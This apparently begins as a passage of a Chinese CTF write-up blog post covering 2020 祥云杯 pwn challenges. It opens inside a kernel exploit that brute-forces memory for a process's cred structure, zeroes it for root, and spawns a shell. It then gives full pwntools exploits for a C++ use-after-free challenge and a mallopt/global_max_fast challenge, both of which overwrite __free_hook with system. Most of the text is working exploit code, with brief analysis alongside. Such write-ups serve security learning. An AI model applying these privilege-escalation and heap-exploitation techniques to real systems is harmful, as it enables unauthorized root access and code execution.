    unsigned long long data_addr = *(size_t *)p;
    printf("data_addr:0x%llx\n",data_addr);

    puts("begin write vul:");
    for(int i = 0; i<100; i++)
    {
        write(fd, buf, 0xf000);
        llseek(fd, 0, 0);
    }
    //getchar();
    unsigned char *buf_struct = malloc(0x1000);
    puts("[+] We can read and write any memory! [+]");

    char target[16] = "This_is_target!";
    prctl(PR_SET_NAME,target);

    size_t cred = 0 , real_cred , target_addr;
    char *buff = malloc(0x100000);
    puts("begin brute cred addr");
    size_t res, tmp = 0;
    size_t addr = 0;
    for (addr=0x10000; addr<0xFFFFC80000000000; addr+=0x10000)
    {

        llseek(fd, addr+1, 0);
        *(size_t *)buf_struct = -(long long)(addr >> 8);
        *(size_t *)(buf_struct + 8) = 0x100000000000LL;
        printf("off:0x%llx  0x%llx\n",*(size_t *)buf_struct, addr);
	    write(fd, buf_struct, 0x1000);
        llseek(fd, 0, 0);
        read(fd, buff, 0x10000);

        u_int result = memmem(buff,0x10000,target,16);
        if (result)
        {
            printf("[+] Find try2findmesauce at : 0x%llx 0x%x  0x%llx 0x%x \n",addr, result, buff, (u_int)buff);
	    	res = result - (u_int)buff;
	    	tmp = buff + res;
	    	printf("Found Target: %s 0x%llx\n",tmp, *(size_t *)tmp);
	    	//getchar();
            cred = *(size_t *)(tmp - 0x8);
            real_cred = *(size_t *)(tmp - 0x10);
            //if ((cred || 0xff00000000000000) && (real_cred == cred))
            {
                target_addr = data_addr - addr+res;
                printf("[+] found task_struct 0x%llxn",target_addr);
                printf("[+] found cred 0x%lx \n",real_cred);
                break;
            }
        }
    }

    //edit cred_struct
    res = real_cred -(data_addr - addr) - 0x10000;
    printf("res: %ld %lx addr: %lx\n",res,res,data_addr);
    char root_cred[0x100];
    memset((char *)root_cred,0,0x100);
   // getchar();
    llseek(fd, addr+0x10000+1, 0);
    *(size_t *)buf_struct = -(long long)((addr-0x10000) >> 8);
    *(size_t *)(buf_struct + 8) = 0x100000000000LL;
    printf("off:0x%llx  0x%llx\n",*(size_t *)buf_struct, addr);
    write(fd, buf_struct, 0x1000);
    llseek(fd, res, 0);
    write(fd, root_cred, 28);
}

int main(int argc,char * argv[]){
    init();
    if(argc > 1){
        if(!strcmp(argv[1],"--breakpoint")){
            printf("[%p]n",exploit);
        }
        return 0;
    }
    save_user_status();

    exploit();

    if(getuid() == 0) {
        printf("[!!!] Now! You are root! [!!!]n");
        system("/bin/sh");
    }else{
        printf("[XXX] Fail! Something wrong！ [XXX]n");
    }
    return 0;
}

babypwn

这题真是太简单了，我比赛的时候竟然没做。这真就被c++吓住了呗，（：以后不能这样了。

程序分析

case 1u:
  chunk = (_QWORD *)operator new(0x88uLL);// init
  struct0 = *struct_ptr;
  *chunk = off_401990;
  chunk[16] = 0LL;
  *struct_ptr = chunk;
  if ( struct0 )
    operator delete(struct0, 0x88uLL);
  break;
case 2u:                                  // create
  init_chunk = *struct_ptr;               // vul
  create_chunk = (_QWORD *)operator new(8uLL);
  v7 = struct_ptr[1];
  a3 = create_chunk;
  struct_ptr[1] = create_chunk;
  *create_chunk = init_chunk;
  if ( v7 )
    operator delete(v7, 8uLL);
  break;
case 3u:
  Add(*a3);
  break;
case 4u:
  Set(*a3);

程序使用 C++ 实现了一个简单的菜单题。漏洞存在于重复执行 init函数时，会将之前的 init_chunk 删掉，申请新的 init_chunk。但是，此时的 create_chunk中存的 init_chunk_ptr仍然是指向旧的 init_chunk。而后续执行 set函数时，是使用 create_chunk中存的 init_chunk_ptr指针找到init_chunk，然后从其中读出需要操作的chunk_ptr和size，也就是此处存在一个 UAF漏洞。

利用分析

我们先利用重复执行 Init，实现释放 0x90到unsortedbin中，然后泄露地址。

然后再 Add一个 0x80的块，将 old_int_chunk申请回来。那么此时 old_init_chunk的 +8位置处存储了 heap地址。可以再次泄露 Heap地址。

随后利用 create_chunk指向了 old_init_chunk，修改 old_init_chunk 中的 chunk_ptr和 size实现任意写。

EXP

from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])

debug = 1
if debug == 1:
    p= process('./pwn')
    elf = ELF('./pwn')
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
gadgets = [0x45226, 0x4527a, 0xf0364, 0xf0370, 0xf1270]
def Init():
    p.sendlineafter('choice:\n', '1')

def Create():
    p.sendlineafter('choice:\n', '2')

def Add(size):
    p.sendlineafter('choice:\n', '3')
    p.sendlineafter('please input size:\n', str(size))

def Set(content):
    p.sendlineafter('choice:\n', '4')
    p.sendafter('content:\n',content)

def Show():
    p.sendlineafter('choice:\n', '5')
    p.recvuntil('show:\n')

def Pwn():
    Init()
    Create()
    Add(0x20)

    Init()
    Show()
    libc_addr = u64(p.recv(6).ljust(8, b'\x00')) - 88 - 0x10 -libc.sym['__malloc_hook']
    libc.address = libc_addr
    print("libc_addr:",hex(libc.address))
    system_addr = libc.sym['system']
    bin_sh_addr = next(libc.search('/bin/sh\x00'))
    print("bin_addr:",hex(bin_sh_addr))
    gadget = gadgets[1] + libc_addr
    gdb.attach(p, 'bp 0x400d20')
    Add(0x88)
    payload = 'a'*6 + 'bb'
    Set(payload)
    Show()
    p.recvuntil('bb')
    heap_addr = u64(p.recv(8))
    print("heap_addr:",hex(heap_addr))
    free_hook = libc.sym['__free_hook']
    payload = p64(heap_addr + 0x30)+p64(heap_addr) + str(0x300)
    Set(payload)

    payload = p64(heap_addr+0x30) + p64(free_hook) +str(0x100)
    payload = payload.ljust(0x80, b'\x00')
    payload += p64(0) + p64(0x21) + p64(heap_addr) + p64(0) + p64(0) + p64(0x31) + '\x00'*0x20 + p64(0) + p64(0x91) + '/bin/sh\x00'
    Set(payload)

    payload = p64(system_addr)
    Set(payload)

    p.sendlineafter('choice:\n', '1')

    p.interactive()

Pwn()

把嘴闭上

程序分析

unsigned __int64 Magic()
{
  int price; // [rsp+0h] [rbp-10h]
  int val; // [rsp+4h] [rbp-Ch]
  unsigned __int64 v3; // [rsp+8h] [rbp-8h]

  v3 = __readfsqword(0x28u);
  puts(">多少钱？\x00%2d");
  price = 0;
  printf(format);
  _isoc99_scanf(&a2d[14], &price);
  puts(asc_1223);
  val = 0;
  printf(format);
  _isoc99_scanf(&unk_1231, &val);
  puts(aDD);
  mallopt(price, val);
  return __readfsqword(0x28u) ^ v3;
}

有一个关注点，就是使用了 mallopt函数。这道题的漏洞应该是出现在这里。

利用分析

mallopt在 glibc2.23存在一个如下漏洞。当我们先释放一个chunk到 unsortedbin中后。再使用mallopt函数修改 global_max_fast的值为0。然后再使用 mallopt 修改 global_max_fast，来触发堆合并。当完成堆合并后，mallopt会重新再 Libc中开辟一段内存空间作为新的堆结构。

#include <stdio.h>
#include <stdlib.h>
#include <malloc.h>
int main() {
// Populate last_remainder, which is treated as the top chunk size field
// after main arena re-initialization.
// 填充last_remainder，将其视为最大块大小字段
void* remainder_me = malloc(0x418);
    malloc(0x18);
    // Avoid top chunk consolidation.
    free(remainder_me);
    malloc(0x18);
    // Remainder remainder_me chunk.
    // Set global_max_fast to 0.
    mallopt(M_MXFAST, 7);
    // Trigger malloc_consolidate(), which could happen during large
    // allocations/frees, but for the sake of simplicity here just call
    // mallopt() again.
    mallopt(M_MXFAST, 0x78);
    // malloc_consolidate() uses global_max_fast to determine if malloc has
    // been initialized. If global_max_fast is 0, malloc_consolidate() will
    // re-initialize the main arena, setting its top chunk pointer to an address
    // within the main arena. Now last_remainder acts as the top chunk size
    // field.
    printf("%p\n", malloc(0x418));
    return 0;
}

此时，可以看到新生成的堆空间包含了 free_hook的地址。所以，我们可以再次不断分配，来覆写 free_hook的值为 system_addr。

而且这题，应该就是根据这个exp 改编而来，所以其执行顺序和大小都有规定。

EXP

from pwn import *
context.update(arch='amd64', os='linux', log_level='debug')
context.terminal=(['tmux', 'splitw', '-h'])

filename = 'ba_zui_bi_shang'
debug = 1
if debug == 1:
    p = process(filename)
    elf = ELF(filename)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
else:
    p = remote('112.126.71.170', 45123)
    elf = ELF(filename)
    libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')


def Add(size, content):
    p.sendlineafter('> ', '1')
    p.sendlineafter('> ', str(size))
    p.sendlineafter('> ', content)

def Delete():
    p.sendlineafter('> ', '2')

def Edit(size, val):
    p.sendlineafter('> ', '3')
    p.sendlineafter('> ', str(size))
    p.sendlineafter('> ', str(val))

def NewLarge(size, content):
    p.sendlineafter('> ', '4')
    p.sendlineafter('> ', str(size))
    p.sendlineafter('> ', content)

def Pwn():
    p.recvuntil('Your Gift : ')
    libc_addr = int(p.recvuntil('\n', drop=True),16) - libc.sym['puts']
    print ('libc_addr:',hex(libc_addr))

    p.sendline(str(0X418))
    p.sendlineafter('> ', 'a'*0x10)

    Add(0x18, 'A1ex')

    Delete()
    Add(0x18, 'A1ex')
    Edit(1, 7)
    gdb.attach(p, 'bp $rebase(0xf15)')
    Edit(1, 0x78)

    NewLarge(0x418, 'A')
    NewLarge(0x418, 'A')
    NewLarge(0x418, 'A')
    NewLarge(0x418, 'A')
    NewLarge(0x418, 'A')
    NewLarge(0x418, 'A')
    NewLarge(0x418, '/bin/sh\x00' + '\x00' * 0x358 + p64(libc.symbols['system'] + libc_addr))

    Delete()

    p.interactive()

Pwn()

本文作者： A1ex
本文链接： http://yoursite.com/2020/11/23/2020祥云杯/
版权声明： 本博客所有文章除特别声明外，均采用 MIT 许可协议。转载请注明出处！